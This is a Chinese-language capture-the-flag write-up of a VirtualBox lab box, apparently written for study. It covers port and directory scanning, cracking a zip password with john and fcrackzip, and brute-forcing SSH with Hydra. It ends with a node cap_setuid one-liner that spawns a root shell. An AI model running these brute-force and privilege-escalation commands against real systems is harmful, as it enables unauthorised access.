信息搜集
主机扫描
arp-scan -l
端口扫描
┌──(root㉿kali)-[~]
└─# nmap -sV -p- 192.168.254.104
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-05-27 09:13 EDT
Nmap scan report for 192.168.254.104
Host is up (0.00030s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
80/tcp open http Apache httpd 2.4.38 ((Debian))
MAC Address: 08:00:27:C2:52:25 (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
路劲扫描
在源码网站发现一个图片,尝试隐写解密,发现没有什么东西,于是换种思路,尝试扫描路径
┌──(root㉿kali)-[/home/kali/Desktop]
└─# gobuster dir -w /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-big.txt -t 100 -b 403,404 -x php,txt,jpg,html,txt,zip -u http://192.168.254.104/
/index.html (Status: 200) [Size: 658]
/nietzsche.jpg (Status: 200) [Size: 22211]
/notes-tips.txt (Status: 200) [Size: 358]
发现一个txt,查看有什么东西
利用赛博厨子解密,先magic发现是base85,
salome doesn't want me, I'm so sad... i'm sure god is dead...
I drank 6 liters of Paulaner.... too drunk lol. I'll write her a poem and she'll desire me. I'll name it salome_and_?? I don't know.
I must not forget to save it and put a good extension because I don't have much storage.
意思是把诗藏在一个路径里,猜测是一个zip,因为提示内存不够,如果不知道,可以使用ffuf直接fuzz以zip结尾的文件。
192.168.254.104/salome_and_me.zip
解压压缩包需要密码,两种工具
zip2john salome_and_me.zip > hash
┌──(root㉿kali)-[/home/kali/Downloads]
└─# john --wordlist=/usr/share/wordlists/rockyou.txt hash
Using default input encoding: UTF-8
Loaded 1 password hash (PKZIP [32/64])
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
turtle (salome_and_me.zip/salome_and_me.txt)
1g 0:00:00:00 DONE (2024-05-27 10:48) 33.33g/s 136533p/s 136533c/s 136533C/s 123456..oooooo
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
或者利用fcrackzip
┌──(root㉿kali)-[/home/kali/Downloads]
└─# fcrackzip -u -D -p /usr/share/wordlists/rockyou.txt salome_and_me.zip
PASSWORD FOUND!!!!: pw == turtle
查看txt内容,发现许多用户名,因为ssh端口的原因,对这些比较敏感,于是提取用户名,并且使用九头蛇爆破
┌──(root㉿kali)-[/home/kali/Downloads]
└─# cat salome_and_me.txt
----------------------------------------------------
GREAT POEM FOR SALOME
----------------------------------------------------
My name is fred,
And tonight I'm sad, lonely and scared,
Because my love Salome prefers schopenhauer, asshole,
I hate him he's stupid, ugly and a peephole,
My darling I offered you a great switch,
And now you reject my love, bitch
I don't give a fuck, I'll go with another lady,
And she'll call me BABY!
使用九头蛇进行爆破
┌──(root㉿kali)-[/home/kali/Downloads]
└─# hydra -L 123.txt -P 123.txt ssh://192.168.254.104
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2024-05-27 10:08:15
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 9 tasks per 1 server, overall 9 tasks, 9 login tries (l:3/p:3), ~1 try per task
[DATA] attacking ssh://192.168.254.104:22/
[22][ssh] host: 192.168.254.104 login: fred password: schopenhauer
获取shell
ssh fred@192.168.254.104
发现ls命令被仅用了,直接查看user.txt
fred@superhuman:~$ tac user.txt
Ineedmorepower
提权
- sudo -l 无这个命令
- 无定时文件可利用
- find / -perm -u=s -type f 2>/dev/null 也没有可利用的命令
- /usr/sbin/getcap -r / 2>/dev/null
发现一个文件具有cap权限
fred@superhuman:~$ /usr/sbin/getcap -r / 2>/dev/null
/usr/bin/ping = cap_net_raw+ep
/usr/bin/node = cap_setuid+ep
直接复制利用,直接提权成功
fred@superhuman:~$ /usr/bin/node -e 'process.setuid(0); require("child_process").spawn("/bin/sh", {stdio: [0, 1, 2]})'
# id
uid=0(root) gid=1000(fred) groups=1000(fred),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev)
# cd /root
# tac root.txt
Imthesuperhuman
知识点
- 信息搜集,字典的利用
- capabilities权限的使用